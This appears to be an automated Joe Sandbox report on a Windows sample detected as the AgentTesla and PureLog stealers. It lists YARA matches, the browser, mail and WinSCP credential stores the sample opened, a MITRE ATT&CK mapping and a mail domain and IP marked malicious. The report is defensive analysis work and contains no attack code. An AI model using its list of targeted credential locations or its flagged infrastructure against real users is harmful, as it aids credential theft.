Source: Yara match	File source: 9.2.jYRIGnZlROed.exe.4592df0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4b29d10.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4ba6330.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4c23170.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.1674653824.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1678075288.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4073894024.0000000002EE4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1678075288.0000000002C1C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4073894024.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4073894024.0000000002EDC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1697688935.000000000438B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1663132505.0000000004922000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe PID: 6552, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 7264, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: jYRIGnZlROed.exe PID: 7360, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 7644, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.2f2275c.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.32ea6c4.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.7d80000.15.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.2f2275c.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.jYRIGnZlROed.exe.31ae900.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.7d80000.15.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.2f32774.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.jYRIGnZlROed.exe.31ae900.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.32e96ac.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.3308724.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.jYRIGnZlROed.exe.31be918.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.32ec6dc.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.2f32774.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.jYRIGnZlROed.exe.31be918.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.3308724.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1662329813.00000000032CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1695168637.00000000031BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1695168637.000000000317B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1667293685.0000000007D80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1662329813.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1662329813.0000000002F32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1662329813.0000000003308000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

Source: Yara match	File source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4c23170.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.jYRIGnZlROed.exe.45cda10.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.jYRIGnZlROed.exe.4592df0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.jYRIGnZlROed.exe.45cda10.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.jYRIGnZlROed.exe.4592df0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4b29d10.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4ba6330.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4c23170.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.1674653824.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1678075288.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4073894024.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1697688935.000000000438B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1663132505.0000000004922000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe PID: 6552, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 7264, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: jYRIGnZlROed.exe PID: 7360, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 7644, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4c23170.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.jYRIGnZlROed.exe.45cda10.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.jYRIGnZlROed.exe.4592df0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.jYRIGnZlROed.exe.45cda10.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.jYRIGnZlROed.exe.4592df0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4b29d10.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4ba6330.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4c23170.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.1674653824.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1678075288.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4073894024.0000000002EE4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1678075288.0000000002C1C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4073894024.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4073894024.0000000002EDC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1697688935.000000000438B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1663132505.0000000004922000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe PID: 6552, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 7264, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: jYRIGnZlROed.exe PID: 7360, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 7644, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.2f2275c.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.32ea6c4.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.7d80000.15.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.2f2275c.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.jYRIGnZlROed.exe.31ae900.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.7d80000.15.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.2f32774.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.jYRIGnZlROed.exe.31ae900.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.32e96ac.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.3308724.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.jYRIGnZlROed.exe.31be918.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.32ec6dc.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.2f32774.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.jYRIGnZlROed.exe.31be918.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.3308724.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1662329813.00000000032CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1695168637.00000000031BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1695168637.000000000317B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1667293685.0000000007D80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1662329813.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1662329813.0000000002F32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1662329813.0000000003308000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	11 Process Injection	1 Deobfuscate/Decode Files or Information	21 Input Capture	24 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Scheduled Task/Job	2 Obfuscated Files or Information	1 Credentials in Registry	211 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	32 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	21 Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	141 Virtualization/Sandbox Evasion	SSH	1 Clipboard Data	23 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	141 Virtualization/Sandbox Evasion	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Link
SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	29%	ReversingLabs
SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	42%	Virustotal	Browse
SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Link
C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	29%	ReversingLabs
C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	42%	Virustotal	Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
mail.elec-qatar.com	2%	Virustotal		Browse
fp2e7a.wpc.phicdn.net	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://www.tiro.com	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/cThe	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/bThe	0%	Virustotal		Browse
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	1%	Virustotal		Browse
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	0%	Avira URL Cloud	safe
http://mail.elec-qatar.com	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn	0%	Virustotal		Browse
http://www.founder.com.cn/cn/cThe	0%	Virustotal		Browse
http://www.zhongyicts.com.cn	0%	Avira URL Cloud	safe
http://mail.elec-qatar.com	2%	Virustotal		Browse
http://www.zhongyicts.com.cn	1%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.ipify.org	104.26.13.205	true	false		high
mail.elec-qatar.com	50.87.139.143	true	true	2%, Virustotal, Browse	unknown
fp2e7a.wpc.phicdn.net	192.229.211.108	true	false	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.ipify.org/	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.apache.org/licenses/LICENSE-2.0	SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com	SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designersG	SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/?	SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/bThe	SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://account.dyn.com/	SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1663132505.0000000004922000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.1674653824.0000000000402000.00000040.00000400.00020000.00000000.sdmp, jYRIGnZlROed.exe, 00000009.00000002.1697688935.000000000438B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers?	SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.tiro.com	SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers	SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.goodfont.co.kr	SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.ipify.org/t	MSBuild.exe, 00000008.00000002.1678075288.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.4073894024.0000000002E6C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, jYRIGnZlROed.exe.0.dr	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.carterandcone.coml	SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sajatypeworks.com	SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.typography.netD	SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/cThe	SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.ipify.org	SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1663132505.0000000004922000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.1674653824.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.1678075288.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, jYRIGnZlROed.exe, 00000009.00000002.1697688935.000000000438B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.4073894024.0000000002E6C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn	SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/frere-user.html	SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.jiyu-kobo.co.jp/	SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://mail.elec-qatar.com	MSBuild.exe, 00000008.00000002.1678075288.0000000002C1C000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.4073894024.0000000002EDC000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/DPlease	SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fonts.com	SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sandoll.co.kr	SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.urwpp.deDPlease	SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1662329813.0000000003068000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.1678075288.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, jYRIGnZlROed.exe, 00000009.00000002.1695168637.000000000322D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.4073894024.0000000002E6C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sakkal.com	SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1667808977.0000000009702000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.26.13.205	api.ipify.org	United States		13335	CLOUDFLARENETUS	false
50.87.139.143	mail.elec-qatar.com	United States		46606	UNIFIEDLAYER-AS-1US	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1398430
Start date and time:	2024-02-25 21:26:04 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 53s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe
Detection:	MAL
Classification:	mal100.spre.troj.spyw.evad.winEXE@20/11@2/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 96% Number of executed functions: 139 Number of non-executed functions: 31
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 23.221.242.90, 20.12.23.50, 72.21.81.240, 192.229.211.108, 20.3.187.198
